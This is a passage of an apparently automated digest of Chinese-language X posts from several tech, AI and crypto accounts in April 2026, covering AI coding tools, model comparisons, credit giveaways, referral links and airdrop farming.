你说说呢\n[原文链接](https://x.com/CuiMao/status/2048739316969648376)\n\n**[2026-04-27T12:10:00+00:00]**\n> 一喝梅酒就浑身刺挠,,我这是过敏吗?\n[原文链接](https://x.com/CuiMao/status/2048736420198842831)\n\n**[2026-04-26T21:23:49+00:00]**\n> 豆包语录\n[原文链接](https://x.com/CuiMao/status/2048513403057283530)\n\n---\n\n### ✅ @0xAA_Science — 0xAA(14 条)\n\n**[2026-04-28T10:24:33+00:00]**\n> 央视报道了 “渔猎齐哥” Up主,真牛逼啊。 监督环境保护,吾辈义不容辞!\n[原文链接](https://x.com/0xAA_Science/status/2049072268165497033)\n\n**[2026-04-28T05:40:29+00:00]**\n> 青椒肉丝饭 + 老盐百香果 6u\n[原文链接](https://x.com/0xAA_Science/status/2049000780519321906)\n\n**[2026-04-28T03:52:33+00:00]**\n> 快连被墙干服了,关停了中国大陆的服务。 我没用过快联,不过这几天群里都是说快连用不了的,感觉用户很多。 有什么好的 vpn 推荐吗?我其实觉得买个海外服务器,让 AI 帮你自建一个 VPN 更靠谱。\n[原文链接](https://x.com/0xAA_Science/status/2048973617854328890)\n\n**[2026-04-27T08:47:12+00:00]**\n> Meta 对 Manus 的收购被中国发改委驳回。 看来以后要么一开始就出海,要么就不出海。\n[原文链接](https://x.com/0xAA_Science/status/2048685380304871774)\n\n**[2026-04-27T07:30:32+00:00]**\n> RT by @0xAA_Science: 用 @gmgnai 的 skill (获取链上数据) + @xapi_to xapi skill(社交搜索)组合玩玩,做了个异动的meme(异动的老币+新币+多链异动同名币+持续上升币),担心再次错过太空狗等信号~ 有 ai 真方便啊~\n[原文链接](https://x.com/0xAA_Science/status/2048666088733581805)\n\n**[2026-04-27T03:49:07+00:00]**\n> 狗B们在组团在 bags 分流太空狗,好恶心啊。 下次它们买什么,咱们就去找个新盘子分,好吗?\n[原文链接](https://x.com/0xAA_Science/status/2048610365324623966)\n\n**[2026-04-26T07:01:25+00:00]**\n> 给 auth2api 加了对 openai/codex 账号的授权支持,等审核完成就会合并。 另外最近 xAPI 也在探索 AI 中转业务,有中转站和号商资源的可以联系我,我建个AI中转交流群,方便大家沟通。 https://github.com/AmazingAng/auth2api\n[原文链接](https://x.com/0xAA_Science/status/2048296373569941533)\n\n**[2026-04-26T04:15:19+00:00]**\n> 感觉 gpt 5.5 的 plan 能力比 opus 4.7 要强。 opus 总是吭哧吭哧搞个很复杂的方案,gpt 给的plan 更简单并能达到同样效果。\n[原文链接](https://x.com/0xAA_Science/status/2048254571622113742)\n\n**[2026-04-26T02:36:56+00:00]**\n> 川普的命真是硬啊,在白宫记者晚宴遭遇枪击,结果又平安无事! 枪手 Cole Allen,来自加州,曾经被评为月度最佳教师。\n[原文链接](https://x.com/0xAA_Science/status/2048229814172275062)\n\n**[2026-04-25T04:05:21+00:00]**\n> 卧槽,收到 Cursor 送的 10,000u AI 额度! 昨天 @edwinarbus 联系我送额度的时候,我还以为是骗子。不过挂着 cursor 的标,而且只是要个邮箱,我抱着试一试的态度回复了,没想道还真送了! 这个月要多 vibe coding 些狗屎了! @VibeShit_Org @cursor_ai\n[原文链接](https://x.com/0xAA_Science/status/2047889676867080420)\n\n**[2026-04-23T10:13:27+00:00]**\n> R to @0xAA_Science: 已经修复了\n[原文链接](https://x.com/0xAA_Science/status/2047257535598706937)\n\n**[2026-04-23T09:47:01+00:00]**\n> 群友反应币安钱包看不到资产,我确认了下,的确显示异常。 但是区块浏览器能看到资金,说明不是被盗,应该是币安钱包的节点/数据服务出了问题,资产安全,大家不要担心! @BinanceWallet @heyibinance @cz_binance\n[原文链接](https://x.com/0xAA_Science/status/2047250882287526158)\n\n**[2026-04-23T07:55:58+00:00]**\n> 下次香港开会可以约个休闲篮球局? 🏀\n[原文链接](https://x.com/0xAA_Science/status/2047222936923525438)\n\n**[2026-04-22T13:08:23+00:00]**\n> 最近看到一个 AI x 预测市场的项目,UniPat AI @UniPat_AI ,把预测做成了可对比、可验证的一套系统。 我找创始人聊了下: 1. 预测市场很火,但是能用 AI 精准预测的项目很少,而他们在这一方面走在了前面。 2. 目前框架已经搭好,并且推出了 Echo 模型,目前在 benchmark 上排第一,和真实市场对比也有优势(对标 Polymarket 胜率 63.2%)。 3.…\n[原文链接](https://x.com/0xAA_Science/status/2046939173710676227)\n\n---\n\n### ✅ @dingyi — Ding(20 条)\n\n**[2026-04-29T03:49:14+00:00]**\n> 我就知道🤣🤣🤣\n[原文链接](https://x.com/dingyi/status/2049335171066061234)\n\n**[2026-04-29T01:47:21+00:00]**\n> Ghostty 离开 GitHub,同一天 Warp 宣布开源。 Warp 一直以来都很好用,但越来越臃肿,性能也差点意思,但对不会命令行的非程序员非常友好,这次开源可以说是一个重大转折点,没准半年后各种 Warp 变体都会出现了。 还有,Warp 现在的垂直 tab 就比基于 Ghostty 的那些 Cmux 好用多了,期待未来出现更多好用的终端!\n[原文链接](https://x.com/dingyi/status/2049304499093946475)\n\n**[2026-04-28T22:59:18+00:00]**\n> 我去有人知道这是哪位大神设计的吗?@FateTell 应该是今年看到的设计最精美又好玩的 iOS app 了 !算命 + AI 结合很有创意,细节打磨的也相当好。哪怕你对八字之前不感兴趣,我也建议下载一个把玩一下。看多了千篇一律 vibe 的产品,突然看到这个真的让人眼前一亮啊。 https://fatetell.com/zh-CN/invite?referral=QQE5QT\n[原文链接](https://x.com/dingyi/status/2049262208241332358)\n\n**[2026-04-28T16:58:50+00:00]**\n> So good!\n[原文链接](https://x.com/dingyi/status/2049171494329065493)\n\n**[2026-04-28T16:40:15+00:00]**\n> 最喜欢的硅谷科技公司之一 Poolside 发布模型了!他们的网站设计简直是艺术品。 https://poolside.ai/\n[原文链接](https://x.com/dingyi/status/2049166818452160778)\n\n**[2026-04-28T15:07:51+00:00]**\n> 周末刚说完 Cursor 很聪明,小米马上就学会了。免费给一个月会员,也没几个钱,不管谁申请都秒过,相当于请所有网友免费宣传,万一还有不少人忘了关掉自动续费,反而还赚了🤣 我感觉以后所有模型厂商都学会这招了,再也没有他们的商单了。。。\n[原文链接](https://x.com/dingyi/status/2049143565260042558)\n\n**[2026-04-28T11:59:03+00:00]**\n> 之前买过 ZenMux 速度还是挺快的, 算是 OpenRouter alternative 吧。咱也不是很懂,感觉既然能上 OpenCode 的第三方列表,说明还是比较正规和靠谱的吧? 目前 DeepSeek V4 限时免费体验:https://zenmux.ai/invite/RUR17S\n[原文链接](https://x.com/dingyi/status/2049096050158551248)\n\n**[2026-04-28T09:01:04+00:00]**\n> 国内银行大概是永远也不会有这种工具了。 https://rayfinance.app/\n[原文链接](https://x.com/dingyi/status/2049051261295878623)\n\n**[2026-04-28T04:19:58+00:00]**\n> 绝了哈哈哈哈,卖铲子给卖铲子的人。。。其实就是用 new-api 一键部署一个,竟然卖这么贵。我觉得我也可以这么搞🤣\n[原文链接](https://x.com/dingyi/status/2048980519019528349)\n\n**[2026-04-28T03:26:53+00:00]**\n> 已申请!邀请你参加 Xiaomi MiMo Orbit 百万亿 Token 创造者激励计划,100T Credits 面向全球用户限时发放中... https://100t.xiaomimimo.com/\n[原文链接](https://x.com/dingyi/status/2048967160287072576)\n\n**[2026-04-28T02:14:39+00:00]**\n> 小扎当年在天安门跑步,跪舔了半天也没得到国家的好处,这次国家算是还了人情。半年后再看,谁还要收购这么个破玩意,小扎做梦都要笑醒了。 创始团队也没啥损失,再搞一个项目很快就会拿到风投估值上亿。\n[原文链接](https://x.com/dingyi/status/2048948980655292914)\n\n**[2026-04-27T13:45:23+00:00]**\n> 把 new-api 的 UI 用 Hero UI 重构了一遍。之前他们用的那个抖音的 semi 设计系统太垃圾了。\n[原文链接](https://x.com/dingyi/status/2048760423491764431)\n\n**[2026-04-27T09:47:04+00:00]**\n> 以后有好东西是真不能说出去,大家都知道了很快就没了。。。DMIT 美区 Premium 竟然所有套餐都卖光了,前两天还全都有呢。\n[原文链接](https://x.com/dingyi/status/2048700446425165890)\n\n**[2026-04-27T02:37:06+00:00]**\n> 刚发现私信里好多人问:怎么搞 cursor,哪里申请。 还有人更直接:账号密码发过来,给我用用。。。 我。。。。。。\n[原文链接](https://x.com/dingyi/status/2048592243754504229)\n\n**[2026-04-27T02:09:47+00:00]**\n> 每天刷 timeline: 外国人都是认真分享自己的作品、产品、生活。 中国人都是:注册美国公司、买海外 sim 卡、薅羊毛、吵架撕逼……\n[原文链接](https://x.com/dingyi/status/2048585369315316105)\n\n**[2026-04-26T22:57:15+00:00]**\n> A small library of quiet loaders. https://icons.icantcode.fyi/\n[原文链接](https://x.com/dingyi/status/2048536915222376906)\n\n**[2026-04-26T14:59:04+00:00]**\n> Pinned: Been testing NanoClaw for a few days, hooked it up to OpenRouter's free inclusionai/ling-2.6-1t:free model. The speed is absolutely wild. NanoClaw is already lightweight and snappy. Add @AntL…\n[原文链接](https://x.com/dingyi/status/2048416578396655905)\n\n**[2026-04-26T13:01:07+00:00]**\n> So DESIGN.md files are basically Tailwind base CSS files? https://designdotmd.directory/\n[原文链接](https://x.com/dingyi/status/2048386895995191344)\n\n**[2026-04-26T07:51:39+00:00]**\n> 都快猝死了烧了两天才 $695,靠 human in the loop 一个月肯定是烧不完 $10000 的。 突然发现他们的 Cloud agents 很好用,云端就不会因为本地机器的性能问题卡住了,还能执行自动化。再加上这个 multitask,应该可以在一个月内花光 token 了。\n[原文链接](https://x.com/dingyi/status/2048309013675216966)\n\n**[2026-04-26T01:38:08+00:00]**\n> 笑死了,看到这个人写了很长一篇文章给每马斯克和 X 团队,说为什么总把他的创作者收益停掉。他说:我一直坚持高质量的原创啊! 我看了一眼,全是这种胡编乱造 AI 生成的擦边色情小短文。。。流量自然很高。 还是那句话,外国人只是单纯,不是傻逼。\n[原文链接](https://x.com/dingyi/status/2048215016877519215)\n\n---\n\n### ✅ @GoSailGlobal — Jason Zhu(19 条)\n\n**[2026-04-29T09:07:13+00:00]**\n> 做了 2 个月的事:把 GitHub 上每一个 Claude Skill / MCP server / 开源 Agent 工具都索引下来 数据库现在 67,196 个项目 跑了一遍分布分析,结果让我自己愣了 30 秒: - 基尼系数 0.983(破 AppStore、npm、YouTube 纪录) - 54.1% 的项目是 0 star——不是「少 star」,是 0 - Top 1% 占走了 …\n[原文链接](https://x.com/GoSailGlobal/status/2049415194372342164)\n\n**[2026-04-29T08:40:25+00:00]**\n> R to @GoSailGlobal: 3️⃣ 可以把做的张小龙Agent拉到群组 大家可以圆桌讨论,简单易用\n[原文链接](https://x.com/GoSailGlobal/status/2049408452079046944)\n\n**[2026-04-29T08:40:22+00:00]**\n> R to @GoSailGlobal: 2️⃣ 每个agent可以GUI自定义大模型、skill、memory 还可以支持第三方模型\n[原文链接](https://x.com/GoSailGlobal/status/2049408436597899361)\n\n**[2026-04-29T08:40:18+00:00]**\n> R to @GoSailGlobal: 1️⃣ 使用google邮箱登陆 可下载本地软件(最好下载本地) or 网页版使用\n[原文链接](https://x.com/GoSailGlobal/status/2049408421167005763)\n\n**[2026-04-29T08:40:14+00:00]**\n> 被一个二维码拉进了一个 IM 内测群 群里坐着 Codex / Claude Code 实例、张小龙 agent,再加几个真人,大家一起讨论选题 agent 先梳调性,再列大纲,真人在旁边补刀 我做 AgentSkillsHub 看了 67,000+ 个 agent 项目,第一次见有人把 agent 当 IM 里的「一等公民」:不是 bot、不是插件,是好友名单里的成员 它叫 Bloome(ht…\n[原文链接](https://x.com/GoSailGlobal/status/2049408403240571320)\n\n**[2026-04-29T05:32:52+00:00]**\n> 拼接两段 15s的忠犬八公动漫视频 很不错哈\n[原文链接](https://x.com/GoSailGlobal/status/2049361252804427850)\n\n**[2026-04-29T04:07:44+00:00]**\n> Matt Pocock 的 Skill 框架 · 跟其他三家的差异 项目链接:http://github.com/mattpocock/skills · 38K stars · MIT · 单人维护、日活更新 一句话:把资深工程师的纪律装进 Claude Code,让 vibe coder 也能写出能上线的代码。 含 16 个 skill:tdd / diagnose / improve-cod…\n[原文链接](https://x.com/GoSailGlobal/status/2049339826877665496)\n\n**[2026-04-29T03:53:48+00:00]**\n> x.com/i/article/204933030407…\n[原文链接](https://x.com/GoSailGlobal/status/2049336319286063302)\n\n**[2026-04-29T03:20:42+00:00]**\n> 4/29 AI 圈速览 • OpenAI 全系正式登陆 AWS:GPT + Codex + 托管 Agent 一并上线 • Anthropic 拒接军方合作,Google 顺势签下五角大楼新合同 • Claude Code 系统提示 Bug:托管 Agent 失效 + 用户 token 被空转烧光 • mattpocock 开源个人 .claude Skills 目录:工程师级实战合集 • Co…\n[原文链接](https://x.com/GoSailGlobal/status/2049327989951967546)\n\n**[2026-04-29T03:20:09+00:00]**\n> 🔥 今日新鲜 Skills 精选 Top 10(4月29日) 由 http://agentskillshub.top 整理!发现 67000+ AI Agent 工具,每日更新 🚀 Mozilla 出手做统一 LLM 接口 + 跨领域 MCP 扩张,今日生态边界被拓得最宽!!! 1️⃣ mozilla-ai/any-llm ⭐ 1928 | +1928 Mozilla AI 出品——一个接口跟所…\n[原文链接](https://x.com/GoSailGlobal/status/2049327853469310984)\n\n**[2026-04-29T01:58:03+00:00]**\n> 说个冷知识 云服务厂商还是很有投资眼光的 原价或者加价买了H100,现在还能卖那个价,甚至更高 另外他还能出租5年保修期内的机器 这不妥妥当下最具价值的投资品类嘛\n[原文链接](https://x.com/GoSailGlobal/status/2049307192692781200)\n\n**[2026-04-29T01:22:14+00:00]**\n> RT by @GoSailGlobal: 我和张凯的GEO论文,在全球最大的论文平台http://arxiv.org完成审核并正式发布 这应该是全球第二篇与GEO有关的专项论文 论文基于今年3月份最新的数据,包括602条 Prompt、21143 条引用、23745条AI抓取记录,最终形成的一版正式的GEO专项研究报告,欢迎查阅 如果对大家能有帮助,我们打算后面继续抓取更多的数据,进行专项研究并…\n[原文链接](https://x.com/GoSailGlobal/status/2049298176935690588)\n\n**[2026-04-28T16:03:58+00:00]**\n> 当我听说AI博主赚钱,我去做了,发现也不是那样 当我听说知识付费赚钱,我也去做了,发现也不是很赚钱 当我听说线下开课挺赚钱的,中午吃饭被点醒了,我应该去做啥\n[原文链接](https://x.com/GoSailGlobal/status/2049157687766663643)\n\n**[2026-04-28T15:46:21+00:00]**\n> 那我也得查下拉 英国公司 Mark\n[原文链接](https://x.com/GoSailGlobal/status/2049153253464490431)\n\n**[2026-04-28T13:05:22+00:00]**\n> 账号代运营这个事,我只在微信聊天里说过 且没有外传 为什么豆包能知道?微信南山必胜客,可以查查哈\n[原文链接](https://x.com/GoSailGlobal/status/2049112739696513306)\n\n**[2026-04-28T12:54:18+00:00]**\n> RT by @GoSailGlobal: x.com/i/article/204910523511…\n[原文链接](https://x.com/GoSailGlobal/status/2049109953668149643)\n\n**[2026-04-28T12:08:55+00:00]**\n> R to @GoSailGlobal: 我跟前同事说了下我的业务,然后他去问了下豆包\n[原文链接](https://x.com/GoSailGlobal/status/2049098535459553712)\n\n**[2026-04-28T12:08:22+00:00]**\n> 兄弟们,我真没做豆包GEO 你把我收入都曝光了 还曝光了我名字,给我增加了一些没有的业务🤣\n[原文链接](https://x.com/GoSailGlobal/status/2049098393448812767)\n\n**[2026-04-28T09:43:09+00:00]**\n> 来盛大逛了逛 见了推友艾略特@elliotchen100 @evermind 原来他们集团旗下,好多个AI Native团队 拿了一波周边👀\n[原文链接](https://x.com/GoSailGlobal/status/2049061850621296924)\n\n---\n\n### ✅ @frxiaobei — 凡人小北(15 条)\n\n**[2026-04-28T16:56:00+00:00]**\n> 我现在基本不太直接用 Agent了。 介绍下我的AI 搭档,Finn。 现在大部分情况是 Finn 让 Agent 去干活。 工作流其实挺简单的: 我现在会现在 Codex (之前是 Claude Code) 里把一个 Agent 或者 skill 调好,跑到稳定。 然后直接丢给 OpenClaw,后面基本就不太管了 这一步挺关键的。 不然你会发现一个很烦的事情: 你要跟一堆 Agent 来回对…\n[原文链接](https://x.com/frxiaobei/status/2049170782170042513)\n\n**[2026-04-28T16:07:28+00:00]**\n> 现在远程面试可以更干脆了。 面试官当甲方出需求, 应聘者打开 Codex / Claude Code, 直接共享屏幕开始干。 半小时什么都看清了。\n[原文链接](https://x.com/frxiaobei/status/2049158565487935850)\n\n**[2026-04-28T15:53:41+00:00]**\n> 雷老板是懂营销的, 本着拿人 token,替人带货的原则, 替 Xiaomi MiMo 喊个话。\n[原文链接](https://x.com/frxiaobei/status/2049155099071750164)\n\n**[2026-04-28T13:41:13+00:00]**\n> 图像类产品现在分两派: 把单次生成做到极致,和把整个视觉工作流跑通。 flowith 明显是后者,还顺手把视频给 seedance 出来了。 关键是底层就是 image2,而且不止这一个模型。 不管底层怎么换,上层工作流都很稳。 单点极致 + 工作流闭环,两派合一。 对我这种普通用户非常有价值。\n[原文链接](https://x.com/frxiaobei/status/2049121762009632774)\n\n**[2026-04-28T05:05:35+00:00]**\n> Claude Code 最近放飞得厉害,“Let 我”是哪国语言,是被 chinglish 污染了吧。\n[原文链接](https://x.com/frxiaobei/status/2048991998275965022)\n\n**[2026-04-27T16:45:39+00:00]**\n> RT by @frxiaobei: A completely local agent that lives right inside your browser. Powered by Gemma 4 E2B and WebGPU, it uses native tool calling to: 🔍 Search browsing history 📄 Read and summarize page…\n[原文链接](https://x.com/frxiaobei/status/2048805789788413984)\n\n**[2026-04-27T16:44:03+00:00]**\n> Amazing\n[原文链接](https://x.com/frxiaobei/status/2048805385537306677)\n\n**[2026-04-27T16:32:39+00:00]**\n> OpenClaw 4.1x 后对于 GPT 的支持上了一个大台阶,之前只说不干的毛病基本没了。 但是我修改了点 soul 文件里的内容后,他现在讲话总“卧槽”是怎么回事儿。 像极了刚走向社会的二愣子。\n[原文链接](https://x.com/frxiaobei/status/2048802517237350599)\n\n**[2026-04-27T16:24:39+00:00]**\n> OpenClaw 这么频繁的发版,我一开始以为他们掌握了什么自动化测试的黑科技,直到我最近做了两次升级。 😤 虽然 AI 时代讲究一个快,但好歹咱尊重下测试环节。\n[原文链接](https://x.com/frxiaobei/status/2048800504206282887)\n\n**[2026-04-26T19:41:23+00:00]**\n> RT by @frxiaobei: Yes, Obsidian Reader works for X articles and threads using the browser extension. We're also making improvements to the share sheet in Obsidian 1.13 so you'll be able to save more …\n[原文链接](https://x.com/frxiaobei/status/2048487623250063516)\n\n**[2026-04-26T11:39:25+00:00]**\n> RT by @frxiaobei: 1:我做了一张「项目」图 汇报用的 PPT 图之类的! 2:但是甲方需要 4K 图。或者 PSD 图层! 3:于是我试着在 GPT 里面让它给我 做PSD 分层文件。 MD 居然给我做了!改给了我一个分层压缩包! 4:里面的图片居然是 4K 尺寸的! 5:所以我们能通过这个方法获得 GPT 的 4K 图片!\n[原文链接](https://x.com/frxiaobei/status/2048366332639674706)\n\n**[2026-04-26T11:00:35+00:00]**\n> Claude Design 虽好,但是额度不够用啊😮‍💨\n[原文链接](https://x.com/frxiaobei/status/2048356561131905177)\n\n**[2026-04-26T08:35:15+00:00]**\n> RT by @frxiaobei: 一次体检,算不上全量啊。多次体检,基因组,衰老时钟,CGM,可穿戴,得全整起来给AI。直接看看这个 https://orviva.ai, Health memory for AI\n[原文链接](https://x.com/frxiaobei/status/2048319988826820941)\n\n**[2026-04-26T06:14:58+00:00]**\n> 每次刷到这张图都悲从中来。\n[原文链接](https://x.com/frxiaobei/status/2048284683767812133)\n\n**[2026-04-26T05:58:41+00:00]**\n> 早上去爱康国宾做了个年度体检,往年都会直接丢给 chatgpt,今年直接小程序内用了爱康家的 ikkie 健康管家。 虽然做的一言难尽,但医疗 AI 这条线很明显出现了一些底层的变化。 以前那套拿着报告去问 ChatGPT 的玩法有个隐含的前提,问题是我自己定义的。 现在逻辑完全反转, AI 拿到我的全量数据,然后反推出应该关心什么。 在这个形态下我就转变成一个被持续监控和解释的对象。这听起来有…\n[原文链接](https://x.com/frxiaobei/status/2048280586318672269)\n\n---\n\n### ✅ @gkxspace — 余温(18 条)\n\n**[2026-04-29T03:09:17+00:00]**\n> 有做 摄影行业 的朋友吗,有个项目想聊一聊😊\n[原文链接](https://x.com/gkxspace/status/2049325117998592311)\n\n**[2026-04-29T01:38:07+00:00]**\n> R to @gkxspace: 大家的重点不应该放在“六个月”、“不需要人” 技术的迭代速度很快,现在可以10个人变成5个,或许六个月、也或许一年后可能变成1个,直到完全不需要人来做各种重复性工作 更应该关注的是找到自身的价值,在这波AI浪潮里有属于自己的独特性\n[原文链接](https://x.com/gkxspace/status/2049302176900501544)\n\n**[2026-04-28T14:39:43+00:00]**\n> 刚看了郭宇的访谈,提到六个月之后或许就不需要人再工作了,知识工作者应该享受这仅有的六个月。 我并不觉得这是危言耸听,因为按照目前这个阶段,整个发展其实不难看出来。 Claude Code、Skills、OpenClaw,不都在向全自动化发展。 如果再有一次大的模型迭代,下一个颠覆性的产品出现,或许知识工作者的工作真的能完全被 AI 取代。 现在 AI Coding 的能力已经非常非常强了,你做出…\n[原文链接](https://x.com/gkxspace/status/2049136483106230523)\n\n**[2026-04-28T11:08:05+00:00]**\n> 这个 Codex 教程很不错,新手值得一看。 作者一个人演示并行推进 6 个项目:iOS App、React 落地页、Remotion 视频、投资人 Deck、移动端设计稿、Twitter 自动发帖。 5 个有用的技巧: ①Codex 是一个 AI 代理调度中心:编码、文档、浏览器、计算机控制全在一个界面里。你可以同时给多个 AI 代理下指令。 ②插件是别人给你的能力,skills是你自己造的能…\n[原文链接](https://x.com/gkxspace/status/2049083226463797284)\n\n**[2026-04-28T10:26:08+00:00]**\n> 我的 mac 的工作区,这几个都是必不可缺,看来大家差不多,还有没安装的快装一下: 1. Obsidian:用来做内容存档、搭建个人知识库 2. cc-swtich:管理多个 CLI 工具,管理多家模型供应商 3. Codex :最近更新很频繁,体验也越来越好,而且不封号 4. Ghostty:一个非常丝滑的终端,推荐~ 5. 闪电说 + Typless:前者非结构化,后者结构化,配合使用很爽 …\n[原文链接](https://x.com/gkxspace/status/2049072666385006919)\n\n**[2026-04-26T14:41:16+00:00]**\n> 牛逼,卡神又出教程了 4美分/天、KiteSim香港卡,免实名+独享虚拟号 马上跟着教程申请一张!!!\n[原文链接](https://x.com/gkxspace/status/2048412096665145411)\n\n**[2026-04-25T16:04:44+00:00]**\n> R to @gkxspace: agent.creao.ai/signup?ref=Ws…\n[原文链接](https://x.com/gkxspace/status/2048070713601376712)\n\n**[2026-04-25T13:45:29+00:00]**\n> R to @gkxspace: x.com/gkxspace/status/204803…\n[原文链接](https://x.com/gkxspace/status/2048035672078844248)\n\n**[2026-04-25T13:44:55+00:00]**\n> 用 CREAO AI 一句话直接做出来的一个电商智能体,这个效果有点太离谱了。 简直就是小白福音,还内嵌了平常会用到的各种API,不用折腾各种API KEY,支持云端一键部署,太强了。 我的提示词: 我需要一个智能体实现:电商新品从0到上架 选品→找供应商→写详情页→生产品图→定价→广告文案,全套\n[原文链接](https://x.com/gkxspace/status/2048035527459319854)\n\n**[2026-04-25T13:32:58+00:00]**\n> 生财有术、得到新商学,哪个更好一些 最近都在折扣阶段,生财2765、得到2888,还没进过这种大的社群,尝试一下 你会选生财、得到、生财+得到都要,或者还有更好的推荐吗🤔\n[原文链接](https://x.com/gkxspace/status/2048032521942626343)\n\n**[2026-04-25T06:15:53+00:00]**\n> 去了趟书店,被震惊了,到底谁在买这些书啊😅\n[原文链接](https://x.com/gkxspace/status/2047922526685155786)\n\n**[2026-04-25T04:13:59+00:00]**\n> RT by @gkxspace: Cursor官方认证博主✅ 你值得关注 11位晒Cursor $10,000额度博主,按X发帖时间大致排序 1️⃣ 铁锤人 (@lxfater) 简介:在用 AI 协助创业,GitHub 维护 3w star 项目,写过 1200w 浏览文章,公众号:铁锤人 推文链接:https://x.com/lxfater/status/204773843982373309…\n[原文链接](https://x.com/gkxspace/status/2047891848908472433)\n\n**[2026-04-24T11:36:13+00:00]**\n> 兄弟们,这个邀请码太难搞了 我找官方要了一些,大家给 OpenClaw/Hermes Agent 配置一个免费的AI邮箱 ClawEmail :https://claw.163.com/?channel=gkxspace 邀请码:CLAW0799450B9EF5 可以使用两百次,大家快配置一下\n[原文链接](https://x.com/gkxspace/status/2047640751774060771)\n\n**[2026-04-24T01:54:50+00:00]**\n> 歸藏大佬的 PPT SKill 终于来了,审美依旧没对手,可以吧之前的 PPT SKill 换掉了 配合刚出的 GPT5.5 和 新版 Codex,简直无敌 https://github.com/op7418/guizang-ppt-skill\n[原文链接](https://x.com/gkxspace/status/2047494444857913663)\n\n**[2026-04-23T12:32:29+00:00]**\n> R to @gkxspace: https://claw.163.com/?channel=gkxspace 现在可以报名内测,通过这个可以很快通过\n[原文链接](https://x.com/gkxspace/status/2047292526759931980)\n\n**[2026-04-23T12:28:41+00:00]**\n> x.com/i/article/204728945783…\n[原文链接](https://x.com/gkxspace/status/2047291569565303239)\n\n**[2026-04-22T13:06:00+00:00]**\n> 用了两天志辉大佬开源的 skills-manage,好家伙,这个工具解决了我一个大痛点。 以前我的 Skill 文件散落在各种地方,每次更新一个 Skill,得手动同步。 skills-manage 用 ~/.agents/skills/ 做中央仓库,其他平台通过软链接指向这里。一处修改,全平台生效。 并且: 1. 可以从 GitHub 直接导入 Skill 仓库 2. 支持 20+ 个 AI …\n[原文链接](https://x.com/gkxspace/status/2046938571395760307)\n\n**[2026-04-22T11:34:21+00:00]**\n> x.com/i/article/204660489877…\n[原文链接](https://x.com/gkxspace/status/2046915506523783421)\n\n---\n\n### ✅ @Stv_Lynn — Steven Lynn(13 条)\n\n**[2026-04-27T10:37:36+00:00]**\n> Image\n[原文链接](https://x.com/Stv_Lynn/status/2048713165232644251)\n\n**[2026-04-25T18:40:34+00:00]**\n> R to @Stv_Lynn: github.com/stvlynn/quote-bud…\n[原文链接](https://x.com/Stv_Lynn/status/2048109932751560818)\n\n**[2026-04-25T18:40:33+00:00]**\n> R to @Stv_Lynn: 3. 逆向了 Quote 的官方固件,成功实现了 USB 写入图像\n[原文链接](https://x.com/Stv_Lynn/status/2048109929203212615)\n\n**[2026-04-25T18:40:32+00:00]**\n> R to @Stv_Lynn: github.com/stvlynn/Stakka\n[原文链接](https://x.com/Stv_Lynn/status/2048109925612851296)\n\n**[2026-04-25T18:40:32+00:00]**\n> R to @Stv_Lynn: 2. 继续 push 一下 stekka 之前没有做过移动端,很大一部分原因是 sonnet-3.5 时代还没法稳定生成 swift,一直在用 react native 做一些简单小应用 现在发现主流 SOTA 模型已经能很稳定地产出 swift 了 自动化测试也通过 AXE 搞定了✅\n[原文链接](https://x.com/Stv_Lynn/status/2048109922936910037)\n\n**[2026-04-25T18:40:31+00:00]**\n> Cursor 送的 10000 刀,我拿来做了什么 昨天被 @cursor_ai 投喂了,于是决定好好记录一下与 Cursor 3 共创的全部过程。以下是第一天花掉 121 刀的记录 1. 写了个主页 想起来上一个主页还是去年拿 opus-3.7 写的,刚好通过 Cursor 用 GPT-5.5 重构 (文案请忽略不代表最终效果) 感觉吃上细糠了!\n[原文链接](https://x.com/Stv_Lynn/status/2048109919266852875)\n\n**[2026-04-25T12:08:29+00:00]**\n> RT by @Stv_Lynn: 最近校招面试了不少 985 实习生,一个很强烈的感受是:AI 工具正在把学生之间的资源差距快速放大。 从我这段时间的感受看,差距真的可能到 5 倍。那些明显领先很多的同学,无一例外都比较早接触了 Claude Code、Codex 这类最好的 AI Coding 工具,也愿意自己花钱订阅。他们不只是会用工具,而是已经把它们变成了日常学习和开发的一部分。聊模型、工…\n[原文链接](https://x.com/Stv_Lynn/status/2048011261473128477)\n\n**[2026-04-25T05:23:57+00:00]**\n> 忘了说了其实我也有👉👈 感谢 @cursor_ai ,这周尽快把 Stakka 给 ship 出来!\n[原文链接](https://x.com/Stv_Lynn/status/2047909458484040105)\n\n**[2026-04-24T03:37:07+00:00]**\n> R to @Stv_Lynn: api-docs.deepseek.com/zh-cn/…\n[原文链接](https://x.com/Stv_Lynn/status/2047520184408371233)\n\n**[2026-04-24T03:36:54+00:00]**\n> DeepSeek V4 支持了 FIM,也就是在一段文本的中间进行补全 很适合代码场景\n[原文链接](https://x.com/Stv_Lynn/status/2047520130499051872)\n\n**[2026-04-24T03:09:34+00:00]**\n> DeepSeek V4 终于生了!\n[原文链接](https://x.com/Stv_Lynn/status/2047513252171825530)\n\n**[2026-04-23T07:23:05+00:00]**\n> RT by @Stv_Lynn: GPT Image 2 is insanely good...I generated a 360° equirectangular panorama in Happycapy with just a skill + prompt. Step 1: Select the generate-image skill Step 2: Enter a prompt lik…\n[原文链接](https://x.com/Stv_Lynn/status/2047214663721681288)\n\n**[2026-04-22T15:04:18+00:00]**\n> 再这样下去 image2 估计很快就要被玩坏了 后面说不定要像 sora 一样加很多限制\n[原文链接](https://x.com/Stv_Lynn/status/2046968345170526386)\n\n---\n\n### ✅ @chuxiaeth — 初夏(8 条)\n\n**[2026-04-29T04:52:50+00:00]**\n> 🧵 最近主攻各平台的嘴撸创作者赛道,不卷且能稳定产出收益。这波参与的是 @MindoAI 和 @useTria 的联合活动 🎯 策略上我依然聚焦推文创作,辅以低磨损的轻交互。活动需要交易量和办卡,门槛确实比纯内容局高,但我不会去死磕资金堆量的维度,找准自己优势位最重要 📊 Tria交互链接:http://app.tria.so/?accessCode=3RPJYP7003&utm_source=…\n[原文链接](https://x.com/chuxiaeth/status/2049351176433623539)\n\n**[2026-04-28T08:48:42+00:00]**\n> Pinned: 04年女大,在美国。元气少女,活力满满,Web3菜鸟,希望多向各位大佬学习。\n[原文链接](https://x.com/chuxiaeth/status/2049048148660965739)\n\n**[2026-04-28T08:38:27+00:00]**\n> 开始上 >@TermMaxFi 了,是不是有些晚了,按照网上的教程,每天来签到,再写一篇推特的帖子,拿MP空投积分。 #TermMax 是 DeFi 固定利率借贷与循环借贷策略类的项目。预计今年Q2发币。\n[原文链接](https://x.com/chuxiaeth/status/2049045566857064461)\n\n**[2026-04-28T08:30:58+00:00]**\n> R to 